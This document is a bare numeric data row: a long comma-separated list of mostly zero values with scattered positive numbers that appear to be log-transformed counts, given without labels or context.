0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0, 0, 0.0, 0.0, 5.723585101952381, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 3.2958368660043296, 0.0, 0.0, 0.0, 2.6390573296152584, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 5.017279836814924, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 3.58351893845611, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 1.6094379124341003, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 9.129416400820892, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 2.772588722239781, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 3.4011973816621555, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.302585092994046, 0, 3.0841946160253877, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.302585092994046, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 1.0986122886681098, 0.0, 0.0, 0.0, 0.0, 1.0986122886681098, 3.9318256327243257, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.70805020110221, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 4.634728988229636, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 5.101797476893978, 0, 0, 0.0, 0.0, 0.0, 0.0, 5.723585101952381, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 5.723585101952381, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 2.302585092994046, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.0986122886681098, 3.58351893845611, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 5.332718793265369, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.0986122886681098, 0.0, 0, 0.0, 2.302585092994046, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 1.791759469228055, 0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 1.9459101490553132, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.6931471805599453, 0.0, 0.0, 0.0, 0.0, 1.9459101490553132, 2.5649493574615367, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.6931471805599453, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 1.791759469228055, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 13.426106100346976, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 1.0986122886681098, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 4.04305126783455, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.9318256327243257, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.6931471805599453, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 5.58914919554, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.302585092994046, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 2.1972245773362196, 3.3322045101752034, 0.0, 0.0, 0.0, 0.0, 0.0, 2.1972245773362196, 0.0, 1.0986122886681098, 0.0, 1.6094379124341003, 0.0, 0.0, 0, 0, 0.0, 1.0986122886681098, 0.0, 0.0, 0, 3.649511027115099, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 1.0986122886681098, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.6931471805599453, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 3.9512437185814275, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.8903717578961645, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.0986122886681098, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 2.1972245773362196, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.6931471805599453, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 2.9957322735539913, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 2.3978952727983707, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.772588722239781, 0.0, 5.723585101952381, 2.1972245773362196, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.2188758248682006, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.0794415416798357, 1.6094379124341003, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.791759469228055, 0, 1.791759469228055, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 1.0986122886681098, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 2.8903717578961645, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.791759469228055, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.3862943611198906, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.9889840465642745, 0, 2.833213344056216, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 4.518263445217986, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 3.044522437723423, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.3978952727983707, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 1.6094379124341003, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 5.723585101952381, 0.0, 0.0, 4.1588830833596715, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 1.0986122886681098, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.6931471805599453, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.4339872044851467, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.302585092994046, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.0986122886681098, 3.4011973816621555, 0.0, 1.0986122886681098, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 1.3862943611198906, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.9459101490553132, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.7612001156935624, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.58351893845611, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 3.7369991058576035, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.6094379124341003, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.0986122886681098, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 2.5649493574615367, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 